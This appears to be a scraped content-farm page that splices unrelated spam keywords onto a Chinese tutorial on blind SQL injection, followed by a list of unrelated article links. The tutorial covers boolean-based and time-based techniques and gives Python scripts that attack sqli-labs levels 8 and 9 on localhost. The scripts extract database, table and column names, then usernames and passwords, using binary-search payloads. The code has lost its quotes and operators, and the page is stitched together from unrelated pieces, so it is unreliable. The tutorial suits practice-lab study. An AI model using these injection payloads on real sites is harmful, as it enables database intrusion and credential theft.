当前位置: 首页 > news >正文

php宠物用品公司网站源码地推是什么意思

php宠物用品公司网站源码,地推是什么意思,外贸英文网站,如何建设网站安全管理制度一、布尔盲注 布尔盲注#xff08;Boolean-based Blind SQL Injection#xff09;是一种SQL注入技术#xff0c;用于在应用程序不直接显示数据库查询结果的情况下#xff0c;通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的…一、布尔盲注 布尔盲注Boolean-based Blind SQL Injection是一种SQL注入技术用于在应用程序不直接显示数据库查询结果的情况下通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的结果是否为真或假进而推断出数据库中的具体信息。 案例为sqlilabs中的第八关采用二分查找 python脚本 import requests def get_database(URL):# 获取数据库名称s for i in range(1, 10):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and greatest(ascii(substr(database(),{i},1)),{mid}){mid} -- } # 相当于第一个字符{mid}条件判断为真res requests.get(urlURL, paramspayload)if You are in in res.text:high midmid (low high) // 2else:low mid 1mid (low high) // 2s chr(mid)print(数据库名称: s)def get_table(URL):# 获取表名称s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema\security\),{i},1)){mid} -- }res requests.get(urlURL, paramspayload)if You are in in res.text:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(表的名称: s)def get_column(URL):# 获取管理员的字段名称s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema\security\ and table_name\users\),{i},1)){mid} -- }res requests.get(urlURL, paramspayload)if You are in in res.text:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(users表的列: s)def get_result(URl):# 获取用户名和密码信息s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1)){mid} -- }res requests.get(urlURL, paramspayload)if You are in in res.text:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(users表具体数据: s)if __name__ __main__:URL http://127.0.0.1/sqlilabs/Less-8/index.phpget_database(URL)get_table(URL)get_column(URL)get_result(URL) 运行结果 二、时间盲注 时间盲注Time-based Blind SQL Injection是一种SQL注入技术用于在应用程序没有直接回显数据库查询结果的情况下通过构造特定的SQL查询来推测数据库中的信息。这种方法依赖于数据库处理查询时产生的延迟响应来判断条件的真假。 案例为sqlilabs中的第九关同样为二分查找 python脚本 import requests import datetimedef get_database(URL):# 获取数据库名称s for i in range(1, 10):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and if((greatest(ascii(substr(database(),{i},1)),{mid}){mid}),sleep(3),1) -- } # 相当于第一个字符{mid}条件判断为真start datetime.datetime.now()res requests.get(urlURL, paramspayload)end datetime.datetime.now()if (end - start).seconds 3:high midmid (low high) // 2else:low mid 1mid (low high) // 2s chr(mid)print(数据库名称: s)def get_table(URL):# 获取表名称s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema\security\),{i},1)){mid}),sleep(3),1) -- }start datetime.datetime.now()res requests.get(urlURL, paramspayload)end datetime.datetime.now()if (end - start).seconds 3:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(表的名称: s)def get_column(URL):# 获取管理员的字段名称s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema\security\ and table_name\users\),{i},1)){mid}),sleep(3),1) -- }start datetime.datetime.now()res requests.get(urlURL, paramspayload)end datetime.datetime.now()if (end - start).seconds 3:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(users表的列: s)def get_result(URl):# 获取用户名和密码信息s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1)){mid}),sleep(3),1) -- }start datetime.datetime.now()res requests.get(urlURL, paramspayload)end datetime.datetime.now()if (end - start).seconds 3:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(users中的具体数据: s)if __name__ __main__:URL http://127.0.0.1/sqlilabs/Less-9/index.php# get_database(URL)get_table(URL)# get_column(URL)# get_result(URL) 运行结果
http://www.hkea.cn/news/14456487/

相关文章:

  • 哪个网站做外贸网站建设指导思想
  • 免费推广网站大全下载西安房价走势最新消息
  • 中国住房和城乡建设网站什么网站是专门做评论赚钱的
  • 土特产 网站源码优质做网站价格
  • 西安大网站建设公司中小企业网站建设济南兴田德润厉害吗
  • 河南海华工程建设监理公司网站网站建设需求策划书
  • 网站不兼容ie6wordpress 隐私策略
  • 360网站建设搜索淮安建设机械网站制作
  • 创建自己的网站需要准备什么友情链接查询结果
  • 丽水建设局网站文件wordpress 栏目权限
  • 金华网站建设哪个公司好点电子商务网站建设与维护实验报告
  • 郑州企业网站推广网站分享链接怎么做的
  • au网站怎么注册自己造网站
  • 成都建站推广网站开发与硬件合同
  • 彩票网站建设开发大连百姓网
  • 长沙网站seo推广石家庄防疫最新政策
  • 门户网站的建设方案做汽车价格的网站建设
  • 商业平台网站开发工商天眼查官网查企业
  • 网站平台建设项目书软件工程考研科目
  • 网站建设知识童装网站建设文案
  • 个人网站做贷款广告毕业设计做网站怎样的工作量算达标
  • 自己的网站服务器wordpress invoker
  • 个人网站开发总结文档企业建设电子商务网站的目的
  • 网站搜索功能怎样做南通建设工程造价信息网站
  • 深圳网站设计公司 网络服务个人网站备案后可以做行业内容吗
  • 廊坊哪里有做阿里巴巴网站的杭州网站建设洛洛科技
  • 什么是网站建设外包wordpress添加项目
  • 兰州市建设工程招标投标中心网站产品推广宣传语
  • 更新网站要怎么做呢做国外贸易的网站
  • 展览公司网站建设中国城乡建设部网站证书查询